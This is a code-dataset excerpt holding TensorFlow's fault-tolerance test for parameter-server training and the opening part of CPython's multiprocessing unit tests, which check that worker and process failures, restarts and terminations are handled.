source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
fault_tolerance_test.py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Fault tolerance test for parameter server training in TF2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import sys
import threading
import time
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import parameter_server_strategy_v2
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.coordinator import cluster_coordinator
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator as thread_coordinator
from tensorflow.python.training import server_lib
_RPC_ERROR_FROM_WORKER = "GRPC error information from remote target /job:worker"
_RPC_ERROR_FROM_PS = "GRPC error information from remote target /job:ps"
_WORKER_PREEMPTION_THREAD_NAME = "WorkerPreemptionHandler"
_WORKER_THREAD_PREFIX = "WorkerClosureProcessingLoop"
class Model(object):
def __init__(self, coordinator):
self.cluster_coord = coordinator
self.strategy = self.cluster_coord.strategy
with self.cluster_coord.strategy.scope():
self.build()
def build(self):
self.w = variables.Variable(
initial_value=random_ops.random_uniform((10, 10)), dtype=dtypes.float32)
self.iterations = variables.Variable(initial_value=0, dtype=dtypes.int32)
# Allow external control to make the model run its train_fn in an infinite
# loop. This allows us to reliably test worker preemption in the middle of
# function execution.
self.do_infinite_step = variables.Variable(False)
self.rebuild_iterators()
def rebuild_iterators(self, use_dataset_fn=True):
if use_dataset_fn:
def dataset_fn():
data = random_ops.random_uniform((10, 10))
dataset = dataset_ops.DatasetV2.from_tensors([data]).repeat()
return dataset
self.iterator = iter(
self.cluster_coord.create_per_worker_dataset(dataset_fn))
self.iterator2 = iter(
self.cluster_coord.create_per_worker_dataset(dataset_fn))
else:
data = random_ops.random_uniform((10, 10))
dataset = dataset_ops.DatasetV2.from_tensors([data]).repeat()
self.iterator = iter(
self.cluster_coord.create_per_worker_dataset(dataset))
self.iterator2 = iter(
self.cluster_coord.create_per_worker_dataset(dataset))
def _train_fn_internal(self, iterator, iterator2):
x = math_ops.matmul(array_ops.squeeze(next(iterator)), self.w)
x = math_ops.matmul(array_ops.squeeze(next(iterator2)), x)
x = math_ops.matmul(random_ops.random_uniform((10, 10)), x)
self.w.assign_add(x)
@def_function.function
def train_fn(self, iterator, iterator2):
self._train_fn_internal(iterator, iterator2)
while self.do_infinite_step:
self._train_fn_internal(iterator, iterator2)
self.iterations.assign_add(1)
def schedule_training_functions(self, num_steps):
with self.strategy.scope():
for _ in range(num_steps):
self.cluster_coord.schedule(
self.train_fn, args=(self.iterator, self.iterator2))
def join_training_functions(self):
self.do_infinite_step.assign(False)
self.cluster_coord.join()
class BaseFaultToleranceTest(object): # pylint: disable=missing-docstring
def setUp(self, num_workers, num_ps):
super(BaseFaultToleranceTest, self).setUp()
self._cluster = multi_worker_test_base.create_multi_process_cluster(
num_workers=num_workers, num_ps=num_ps, rpc_layer="grpc")
self._cluster_def = self._cluster.cluster_resolver.cluster_spec().as_dict()
self._cluster_def["chief"] = [
"localhost:%d" % multi_worker_test_base.pick_unused_port()
]
cluster_resolver = SimpleClusterResolver(
server_lib.ClusterSpec(self._cluster_def), rpc_layer="grpc")
# The strategy's constructor would connect to the cluster.
self.strategy = parameter_server_strategy_v2.ParameterServerStrategyV2(
cluster_resolver)
self.cluster_coord = cluster_coordinator.ClusterCoordinator(self.strategy)
self.thread_coord = thread_coordinator.Coordinator(
clean_stop_exception_types=[])
self.num_workers = num_workers
self.num_ps = num_ps
def tearDown(self):
super(BaseFaultToleranceTest, self).tearDown()
self._cluster.stop()
self._cluster = None
def _restart(self, downtime_secs, job):
"""Kills `job` (index: 0) and restarts it after `downtime_secs`.
Args:
downtime_secs: secs before restarting the job.
job: a string specifying the job to restart.
"""
self._cluster.kill_task(job, 0)
time.sleep(downtime_secs)
self.assertFalse(context.check_alive("/job:%s/replica:0/task:0" % job))
self._cluster.start_task(job, 0)
while not context.check_alive("/job:%s/replica:0/task:0" % job):
time.sleep(1)
def _restart_in_thread(self, downtime_secs, restart_job):
def _restart_fn():
with self.thread_coord.stop_on_exception():
self._restart(downtime_secs, restart_job)
restart_thread = threading.Thread(target=_restart_fn)
restart_thread.start()
return restart_thread
def _ensure_threads_closed(self):
"""Ensures worker and preemption threads are closed."""
# Worker and preemption threads should exist before releasing
# ClusterCoordinator.
running_threads = test_util.get_running_threads()
self.assertTrue(
test_util.has_thread(_WORKER_THREAD_PREFIX, running_threads))
self.assertIn(_WORKER_PREEMPTION_THREAD_NAME, running_threads)
# Print object graph if ClusterCoordinator may leak.
if sys.getrefcount(self.cluster_coord) > 2:
try:
test_util.show_backref(self.cluster_coord)
except: # pylint: disable=bare-except
pass
# Wait for threads to close.
self.cluster_coord = None
self.strategy = None
gc.collect()
time.sleep(1)
# Verify thread names.
running_threads = test_util.get_running_threads()
self.assertNotIn(_WORKER_PREEMPTION_THREAD_NAME, running_threads)
self.assertFalse(
test_util.has_thread(_WORKER_THREAD_PREFIX, running_threads),
"Worker thread is not stopped properly.")
def _create_model_and_run_indefinitely(self):
model = Model(self.cluster_coord)
model.do_infinite_step.assign(True)
model.schedule_training_functions(10)
# Model does infinite training step, so at this moment, we expect to have
# `self.num_workers` infinite closures inflight, and `10-self.num_workers`
# closures in the queue.
while (self.cluster_coord._cluster.closure_queue._inflight_closure_count <
self.num_workers):
time.sleep(0.1)
return model
def testClusterCoordinatorDestroyed(self):
self._ensure_threads_closed()
def testWorkerPreemptionBetweenFunctions(self):
model = Model(self.cluster_coord)
model.schedule_training_functions(2)
model.join_training_functions()
self.assertEqual(model.iterations.numpy(), 2)
self._restart(downtime_secs=2, job="worker")
model.schedule_training_functions(2)
model.join_training_functions()
self.assertEqual(model.iterations.numpy(), 4)
def testWorkerPreemptionMidstFunction(self):
model = Model(self.cluster_coord)
model.do_infinite_step.assign(True)
model.schedule_training_functions(4)
# Model does infinite training step, so at this moment, we expect to have
# `self.num_workers` infinite closures inflight, and `4-self.num_workers`
# closures in the queue.
while (self.cluster_coord._cluster.closure_queue._inflight_closure_count <
self.num_workers):
time.sleep(0.1)
self.assertFalse(self.cluster_coord.done())
self._restart(downtime_secs=2, job="worker")
model.join_training_functions()
self.assertGreaterEqual(model.iterations.numpy(), 4)
def testOneWorkerPreemptionWithCancellation(self):
@def_function.function
def normal_function():
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
return math_ops.reduce_mean(math_ops.matmul(x, y))
@def_function.function
def error_function():
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
check_ops.assert_non_positive_v2(
math_ops.reduce_sum(math_ops.matmul(x, y)))
return x
@def_function.function
def long_function():
x = random_ops.random_uniform((1000, 1000))
for _ in math_ops.range(10000):
a = random_ops.random_uniform((1000, 1000))
b = random_ops.random_uniform((1000, 1000))
x += math_ops.matmul(a, b)
return x
for _ in range(3):
self.cluster_coord.schedule(normal_function)
long_function_result = self.cluster_coord.schedule(long_function)
self.cluster_coord.schedule(error_function)
time.sleep(1) # Let it run a couple steps.
self._restart(1, "worker")
with self.assertRaises(errors.InvalidArgumentError):
self.cluster_coord.join()
with self.assertRaises(errors.CancelledError):
long_function_result.fetch()
for _ in range(3):
self.cluster_coord.schedule(normal_function)
self.cluster_coord.join()
# The cluster is likely still being recovered since `join` returned early
# due to the error_function.
failure_handler = self.cluster_coord._cluster.failure_handler
failure_handler.stop()
failure_handler._preemption_handler_thread.join()
def testHandleDatasetCreationFailureWithDatasetFn(self):
model = Model(self.cluster_coord)
restart_thread = self._restart_in_thread(5, "worker")
model.schedule_training_functions(3)
model.rebuild_iterators()
model.schedule_training_functions(3)
model.rebuild_iterators()
model.schedule_training_functions(3)
model.join_training_functions()
self.thread_coord.join([restart_thread])
self.assertGreaterEqual(model.iterations.numpy(), 3)
# TODO(yuefengz): consider using combinations when there is more code
# duplication.
def testHandleDatasetCreationFailureWithDataset(self):
model = Model(self.cluster_coord)
restart_thread = self._restart_in_thread(5, "worker")
model.schedule_training_functions(3)
model.rebuild_iterators(use_dataset_fn=False)
model.schedule_training_functions(3)
model.rebuild_iterators(use_dataset_fn=False)
model.schedule_training_functions(3)
model.join_training_functions()
self.thread_coord.join([restart_thread])
self.assertGreaterEqual(model.iterations.numpy(), 3)
def testWorkerPreemptionErrorType(self):
@def_function.function
def worker_train_fn():
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
return math_ops.reduce_mean(math_ops.matmul(x, y))
def run_fn():
with self.thread_coord.stop_on_exception():
with ops.device("/job:worker/replica:0/task:0"):
for _ in range(3):
for _ in range(3):
worker_train_fn()
time.sleep(5)
run_thread = threading.Thread(target=run_fn)
run_thread.start()
time.sleep(1) # Let it run a couple steps.
self._restart(2, "worker")
try:
self.thread_coord.join([run_thread])
except errors.UnavailableError as e:
logging.info("Got exception %r, error message is %s", e, e)
self.assertIn(_RPC_ERROR_FROM_WORKER, str(e)) # pylint: disable=g-assert-in-except
self.assertNotIn(_RPC_ERROR_FROM_PS, str(e))
self.assertTrue("failed to connect to all addresses" in str(e) or
"Unable to find a context_id" in str(e) or
"Socket closed" in str(e) or
"Connection reset by peer" in str(e) or
"Transport closed" in str(e))
def testWorkerPreemptionErrorTypeWithPythonFunction(self):
def worker_train_fn():
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
return math_ops.reduce_mean(math_ops.matmul(x, y))
def run_fn():
with self.thread_coord.stop_on_exception():
with ops.device("/job:worker/replica:0/task:0"):
for _ in range(3):
for _ in range(3):
worker_train_fn()
time.sleep(5)
run_thread = threading.Thread(target=run_fn)
run_thread.start()
time.sleep(1) # Let it run a couple steps.
self._restart(2, "worker")
try:
self.thread_coord.join([run_thread])
except errors.UnavailableError as e:
logging.info("Got exception %r, error message is %s", e, e)
self.assertIn(_RPC_ERROR_FROM_WORKER, str(e)) # pylint: disable=g-assert-in-except
self.assertNotIn(_RPC_ERROR_FROM_PS, str(e))
self.assertTrue("failed to connect to all addresses" in str(e) or
"Unable to find a context_id" in str(e) or
"Socket closed" in str(e) or
"Connection reset by peer" in str(e) or
"Transport closed" in str(e))
def testPSPreemptionErrorType(self):
with ops.device("/job:ps/replica:0/task:0"):
v = variables.Variable(
initial_value=random_ops.random_uniform((2, 10)),
dtype=dtypes.float32)
@def_function.function
def worker_train_fn():
y = random_ops.random_uniform((10, 2))
return math_ops.reduce_mean(math_ops.matmul(v, y))
def run_fn():
with self.thread_coord.stop_on_exception():
with ops.device("/job:worker/replica:0/task:0"):
for _ in range(3):
for _ in range(3):
worker_train_fn()
time.sleep(5)
run_thread = threading.Thread(target=run_fn)
run_thread.start()
time.sleep(1) # Let it run a couple steps.
# Use a short restart delay to cover the case that RPC channel is reused
self._restart(1, "ps")
try:
self.thread_coord.join([run_thread])
except (errors.UnavailableError, errors.AbortedError) as e:
logging.info("Got exception %r, error message is %s", e, e)
self.assertIn(_RPC_ERROR_FROM_PS, str(e)) # pylint: disable=g-assert-in-except
if isinstance(e, errors.UnavailableError):
self.assertTrue("failed to connect to all addresses" in str(e) or
"Unable to find a context_id" in str(e) or
"Socket closed" in str(e) or
"Connection reset by peer" in str(e) or
"Transport closed" in str(e))
if isinstance(e, errors.AbortedError):
self.assertIn("RecvTensor expects a different device incarnation",
str(e))
self._ensure_threads_closed()
def testTwoWorkersPreempted(self):
if self.num_workers < 2:
self.skipTest("Worker number is less than 2.")
model = self._create_model_and_run_indefinitely()
self.assertFalse(self.cluster_coord.done())
self._cluster.kill_task("worker", 0)
self._cluster.kill_task("worker", 1)
time.sleep(2)
self.assertFalse(context.check_alive("/job:worker/replica:0/task:0"))
self.assertFalse(context.check_alive("/job:worker/replica:0/task:1"))
self._cluster.start_task("worker", 0)
self._cluster.start_task("worker", 1)
time.sleep(2)
self.assertTrue(context.check_alive("/job:worker/replica:0/task:0"))
self.assertTrue(context.check_alive("/job:worker/replica:0/task:1"))
model.join_training_functions()
self.assertGreaterEqual(model.iterations.numpy(), 10)
def testWorkerContinuousFailure(self):
model = self._create_model_and_run_indefinitely()
self.assertFalse(self.cluster_coord.done())
self._cluster.kill_task("worker", 0)
time.sleep(2)
self.assertFalse(context.check_alive("/job:worker/replica:0/task:0"))
self._cluster.start_task("worker", 0)
time.sleep(2)
self.assertTrue(context.check_alive("/job:worker/replica:0/task:0"))
self._cluster.kill_task("worker", 0)
time.sleep(2)
self.assertFalse(context.check_alive("/job:worker/replica:0/task:0"))
self._cluster.start_task("worker", 0)
time.sleep(2)
self.assertTrue(context.check_alive("/job:worker/replica:0/task:0"))
model.join_training_functions()
self.assertGreaterEqual(model.iterations.numpy(), 10)
def testPSFailureWhileRecoveryFromWokerFailure(self):
model = self._create_model_and_run_indefinitely()
time.sleep(1)
self.assertFalse(self.cluster_coord.done())
def kill(task):
self._cluster.kill_task(task, 0)
self.sleep(1)
self._cluster.start_task(task, 0)
kill_thread_1 = threading.Thread(target=kill, args=("worker",))
kill_thread_2 = threading.Thread(target=kill, args=("ps",))
kill_thread_1.start()
kill_thread_2.start()
kill_thread_1.join()
kill_thread_2.join()
with self.assertRaises(
(errors.UnavailableError, errors.InvalidArgumentError)):
model.join_training_functions()
def testNumpyFetchedAfterWorkerFailure(self):
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int32)
@def_function.function
def worker_fn():
return v + 1, v - 1
remote_value = self.cluster_coord.schedule(worker_fn)
# Attempt to fetch before killing worker task should succeed.
self.assertEqual((1, -1), remote_value.fetch())
self._cluster.kill_task("worker", 0)
# So should attempt to fetch after killing worker task.
self.assertEqual((1, -1), remote_value.fetch())
def testTensorGotAfterWorkerFailure(self):
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int32)
@def_function.function
def worker_fn():
return v + 1, v - 1
remote_value = self.cluster_coord.schedule(worker_fn)
# Attempt to fetch before killing worker task should succeed.
fetched = remote_value.get()[0]
self.assertIsInstance(fetched, ops.Tensor)
self.assertEqual(fetched.device, "/job:chief/replica:0/task:0/device:CPU:0")
self.assertEqual((1, -1), remote_value.get())
remote_value.get()[0].numpy()
# As well as the remote tensors that point to worker0 or worker1.
values = remote_value._values[0]
self.assertIsInstance(values, ops.Tensor)
self.assertRegex(values.device,
"/job:worker/replica:0/task:[0-1]/device:CPU:0")
self.assertEqual((1, -1), remote_value._values)
remote_value._values[0].numpy()
# Terminate the workers and wait a little so that they are indeed killed.
for i in range(self.num_workers):
self._cluster.kill_task("worker", i)
time.sleep(5)
# Attempt to fetch after killing worker tasks should succeed as well.
remote_value.get()[0].numpy()
self.assertEqual((1, -1), remote_value.get())
# Attempting to copy the tensor from worker now should fail.
with self.assertRaises(errors.UnavailableError) as cm:
remote_value._values[0].numpy()
self.assertIn("failed to connect to all addresses", cm.exception.message)
self.assertIn("/job:worker/replica:0/task:", cm.exception.message)
def testClusterStateNotDisrupted(self):
# This test has side effects and can disrupt other tests, even if the
# resource created by it will not be used in following tests.
# TODO(b/155209534): enable this test.
# self.testPSPreemptionErrorType()
self.thread_coord = thread_coordinator.Coordinator(
clean_stop_exception_types=[])
self.testWorkerPreemptionMidstFunction()
self.thread_coord = thread_coordinator.Coordinator(
clean_stop_exception_types=[])
self.testWorkerPreemptionErrorType()
# In previous tests, workers may fail after training is done. But the
# following tests start with creating resources where failure is not
# handled.
# TODO(b/153888707): enable the following two tests.
# self.testTwoWorkersPreempted()
# self.testWorkerContinuousFailure()
def testJoinRaisesUnavailableErrorAtPsFailure(self):
self._create_model_and_run_indefinitely()
self._cluster.kill_task("ps", 0)
while self.cluster_coord._cluster.closure_queue._error is None:
time.sleep(1)
with self.assertRaises((errors.UnavailableError, errors.NotFoundError,
errors.FailedPreconditionError)):
self.cluster_coord.join()
def testScheduleRaisesUnavailableErrorAtPsFailure(self):
self._create_model_and_run_indefinitely()
self._cluster.kill_task("ps", 0)
while self.cluster_coord._cluster.closure_queue._error is None:
time.sleep(1)
with self.assertRaises((errors.UnavailableError, errors.NotFoundError,
errors.FailedPreconditionError)):
self.cluster_coord.schedule(def_function.function(lambda: None))
def testWorkerExecutionAfterPsFailureRaisesExpectedError(self):
model = self._create_model_and_run_indefinitely()
for i in range(self.num_ps):
self._cluster.kill_task("ps", i)
while self.cluster_coord._cluster.closure_queue._error is None:
time.sleep(1)
@def_function.function
def trivial_function():
return model.iterations + 1
for i in range(self.num_workers):
try:
with ops.device("/job:worker/replica:0/task:{}".format(i)):
trivial_function()
except Exception as e: # pylint: disable=broad-except
if cluster_coordinator._is_ps_failure(e):
if i < self.num_workers - 1:
continue
return
raise AssertionError("Executing a function after PS fails, should "
"result in a PS failure.")
def testAsyncWaitIsNoOp(self):
if self.num_workers < 2:
self.skipTest("Worker number is less than 2.")
model = self._create_model_and_run_indefinitely()
self.assertFalse(self.cluster_coord.done())
self._cluster.kill_task("worker", 0)
time.sleep(2)
self.assertFalse(context.check_alive("/job:worker/replica:0/task:0"))
# Should pass without exception even with failed remote workers
context.async_wait()
model.join_training_functions()
self.assertGreaterEqual(model.iterations.numpy(), 10)
class MultiWorkerFaultToleranceTest(BaseFaultToleranceTest, test.TestCase):
"""Multi worker fault tolerance tests.
This covers the ordinary cases where multiple workers and PS are used.
"""
def setUp(self):
super(MultiWorkerFaultToleranceTest, self).setUp(2, 2)
class SingleWorkerFaultToleranceTest(BaseFaultToleranceTest, test.TestCase):
"""Single worker fault tolerance tests.
This covers the cases that ensure training can continue in a single-worker
cluster, even if the only worker can become unavailable at some point and
recovered (if there are multiple workers, it is possible that the training
succeeds with the workers that did not fail). Realistically single worker
is very rarely used, but the tests are important to ensure the correct
behaviors.
"""
def setUp(self):
super(SingleWorkerFaultToleranceTest, self).setUp(1, 1)
if __name__ == "__main__":
v2_compat.enable_v2_behavior()
multi_process_runner.test_main()
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 60.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
